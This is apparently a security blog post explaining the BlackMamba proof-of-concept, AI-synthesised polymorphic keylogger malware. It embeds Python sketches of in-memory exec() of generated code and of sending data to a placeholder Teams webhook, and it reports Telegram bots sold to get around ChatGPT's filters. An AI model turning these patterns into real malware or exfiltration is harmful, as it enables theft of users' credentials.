Monday, June 24, 2024

Malware Uses AI to Avoid Detection

With the rise of artificial intelligence (AI), cybercriminals have been developing new strains of malware that can evade even the most sophisticated cybersecurity products.

AI Malware

The latest proof-of-concept (PoC) malware, dubbed “BlackMamba” by HYAS researchers, is a prime example of this growing threat. BlackMamba is designed to eliminate the need for command-and-control (C2) infrastructure and to generate new malicious code on the fly, making it extremely difficult to detect.


Leveraging OpenAI, BlackMamba uses a benign executable that reaches out to a high-reputation API at runtime. The API returns the synthesized, malicious code needed to steal an infected user’s keystrokes, and BlackMamba executes this dynamically generated code within the context of the benign program. This makes the malicious component of the malware truly polymorphic: every time BlackMamba executes, it re-synthesizes its keylogging capability.
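The runtime code-synthesis pattern described above can be sketched harmlessly. In this illustrative Python snippet, a local generator stands in for the call to a remote AI API, and the "payload" is a benign assignment rather than a keylogger; the function names (`generate_payload`, `run_payload`) are hypothetical, not taken from the actual PoC:

```python
# Sketch of polymorphic, in-memory code execution: each run synthesizes
# textually different source code with the same behavior, then executes it
# inside the current (benign) process, leaving nothing on disk to scan.
import random

def generate_payload() -> str:
    # Stand-in for an API call that returns freshly synthesized source code.
    # A randomized variable name makes every generated copy textually unique.
    var = f"v{random.randint(1000, 9999)}"
    return f"{var} = 'payload ran'\nresult = {var}"

def run_payload(source: str) -> str:
    # Execute the dynamically generated code in an isolated namespace.
    scope: dict = {}
    exec(source, scope)
    return scope["result"]

print(run_payload(generate_payload()))
```

Because the malicious logic only ever exists as a transient string in memory, signature-based and static-analysis tools have no stable artifact to match against, which is the crux of the detection problem the article describes.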

The keylogger collects sensitive information, including usernames, passwords, and credit card numbers. The data is then exfiltrated using Microsoft Teams and sent to an attacker-controlled Teams channel. HYAS researchers tested BlackMamba against an industry-leading EDR solution, which repeatedly failed to detect the threat.
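The exfiltration channel described above boils down to an ordinary HTTPS POST of JSON to a Teams incoming-webhook URL, which blends in with legitimate traffic to a high-reputation Microsoft domain. A minimal sketch, with a placeholder webhook URL and hypothetical function names:

```python
# Sketch of sending data to a Microsoft Teams channel via an incoming
# webhook. Teams incoming webhooks accept a JSON body with a "text" field.
import json
from urllib import request

WEBHOOK_URL = "https://example.webhook.office.com/..."  # placeholder

def build_message(data: str) -> bytes:
    # Wrap arbitrary text in the JSON shape a Teams webhook expects.
    return json.dumps({"text": data}).encode("utf-8")

def post_to_teams(url: str, body: bytes) -> None:
    req = request.Request(
        url, data=body, headers={"Content-Type": "application/json"}
    )
    with request.urlopen(req) as resp:  # ordinary HTTPS traffic
        resp.read()

body = build_message("demo text")
# post_to_teams(WEBHOOK_URL, body)  # not executed here: placeholder URL
```

From a defender's perspective, this is why C2-less designs are hard to flag: the network traffic is indistinguishable from legitimate Teams webhook usage.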

A New Breed of Threat

BlackMamba is just one example of a new breed of malware that is virtually undetectable by today’s predictive security solutions. By eliminating command-and-control communication and generating new, unique code at runtime, these strains slip past defenses built around recognizing known patterns. According to HYAS principal security engineer Jeff Sims, “the threats posed by this new breed of malware are very real.”

In fact, CyberArk warned earlier this year that OpenAI’s ChatGPT tool could be leveraged to create polymorphic malware that’s extremely difficult to detect. More recently, Check Point researchers warned that cybercriminals are actively bypassing ChatGPT’s content filters by creating and selling access to Telegram bots that leverage ChatGPT’s API. These bots allow the creation of malicious content, such as phishing emails and malware code, without the limitations and barriers that ChatGPT enforces in its user interface.


Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
He holds CISSP, CISA, CISM, ITIL, COBIT and PRINCE2 certifications, among others, and his broad knowledge and technical management capabilities go beyond these certifications. He enjoys acquiring new skills in penetration testing, cloud technologies, virtualization, network security, IoT and more.
